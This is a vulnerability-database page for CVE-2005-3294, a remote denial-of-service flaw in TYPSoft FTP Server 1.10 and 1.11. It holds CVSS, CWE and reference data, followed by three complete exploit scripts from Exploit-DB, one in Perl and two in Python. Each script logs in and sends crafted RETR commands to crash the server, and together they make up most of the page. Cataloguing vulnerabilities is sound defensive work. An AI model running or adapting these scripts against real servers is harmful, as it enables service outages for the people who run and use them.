CVE-2005-3294
CVSS 5.0
Published: 2005-10-23 17:02:00
Last revised: 2011-01-26 00:00:00

[Original text] Typsoft FTP Server 1.11, with "Sub Directory Include" enabled, allows remote attackers to cause a denial of service (crash) by sending multiple RETR commands. NOTE: it was later reported that 1.10 is also affected.


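[CNNVD] TYPSoft FTP Server RETR Denial of Service Vulnerability (CNNVD-200510-177)

        Typsoft FTP Server is an FTP server application.
        Typsoft FTP Server 1.11 has a denial-of-service vulnerability when "Sub Directory Include" is enabled. A remote attacker can cause a denial of service (crash) by sending multiple RETR commands.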

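- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interruptions in resource access]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CWE (Weakness Category)

CWE-399 [Resource Management Errors]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definition found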

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3294
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3294
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-177
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/15104
(UNKNOWN)  BID  15104
http://www.osvdb.org/19992
(UNKNOWN)  OSVDB  19992
http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
(VENDOR_ADVISORY)  MISC  http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
http://www.exploit-db.com/exploits/15860
(UNKNOWN)  EXPLOIT-DB  15860
http://secunia.com/advisories/17196
(VENDOR_ADVISORY)  SECUNIA  17196

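- Vulnerability Information

TYPSoft FTP Server RETR Denial of Service Vulnerability
Medium risk    Other
2005-10-23 00:00:00 2005-10-24 00:00:00
Remote
        Typsoft FTP Server is an FTP server application.
        Typsoft FTP Server 1.11 has a denial-of-service vulnerability when "Sub Directory Include" is enabled. A remote attacker can cause a denial of service (crash) by sending multiple RETR commands.

- Advisories and Patches

        No data available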

- Vulnerability Information (1251)

TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability (EDBID:1251)
windows dos
2005-10-14 Verified
0 wood
N/A
#!/usr/bin/perl

use IO::Socket;
use Socket;

print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";

if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";


$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

$remote->autoflush(1);

print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";

print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die 
"Error: cant send error code\n";

print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote; 

# milw0rm.com [2005-10-14]
		

- Vulnerability Information (12604)

TYPSoft FTP Server v1.10 RETR Command DoS (EDBID:12604)
windows dos
2010-05-14 Verified
0 Jeremiah Talamantes
# Tested on: Windows XP, SP2 (EN)

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TYPSoft FTP Server RETR Command DoS             ##"
print "##                        Version 1.10                         ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"

import socket
import sys

# Description:
# RETR command overflow with no PORT specified

# Define the exploit's usage
def Usage():
    print ("Usage: scriptname.py <IP> <username> <password>\n")
    print ("\n\nCredit: Jeremiah Talamantes")
    print ("RedTeam Security : www.redteamsecure.com/labs\n")

# Buffer
buffer="AAAA" * 496

def exploit(hostname,username,password):
	i=0
	while i < 10:
		i=i+1
		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			sock.connect((hostname, 21))
		except:
			print ("Error: unable to connect to host")
			sys.exit(1)
		r=sock.recv(1024)
		print "[+] " + r + ": iteration number:  ",i
		sock.send("USER " + username + "\r\n")
		r=sock.recv(1024)
		sock.send("PASS " + password + "\r\n")
		r=sock.recv(1024)
		sock.send("RETR " + buffer + "\r\n")
		sock.close()
		
if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    password=sys.argv[3]
    exploit(hostname,username,password)
    sys.exit(0)

# End
		

- Vulnerability Information (15860)

TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service (EDBID:15860)
windows dos
2010-12-29 Verified
0 emgent
#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili <emgent@backtrack-linux.org>
#
# Notes:
# I wrote this exploit because the code published here (1) does not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#

import socket
import sys

user="test"
pwd="test"
buffer="\x41"

print("\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + '\r\n')
data = s.recv(1024)
s.send("PASS " + pwd + '\r\n')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
print("[+] Sending second exploit stage...\n")
s.send("RETR " + buffer + '\r\n')
data = s.recv(1024)
s.close()
		

- Vulnerability Information (F97139)

TYPSoft FTP Server 1.10 Denial Of Service (PacketStormID:F97139)
2010-12-29 00:00:00
Emanuele Gentili  
exploit,denial of service
CVE-2005-3294,OSVDB-19992

TYPSoft FTP Server version 1.10 RETR CMD denial of service exploit.


- Vulnerability Information

19992
TYPSoft FTP Server Crafted RETR Command DoS
Denial of Service
Loss of Availability
Exploit Public

- Vulnerability Description

- Timeline

2005-10-13 Unknown
2005-10-13 Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete
 

 
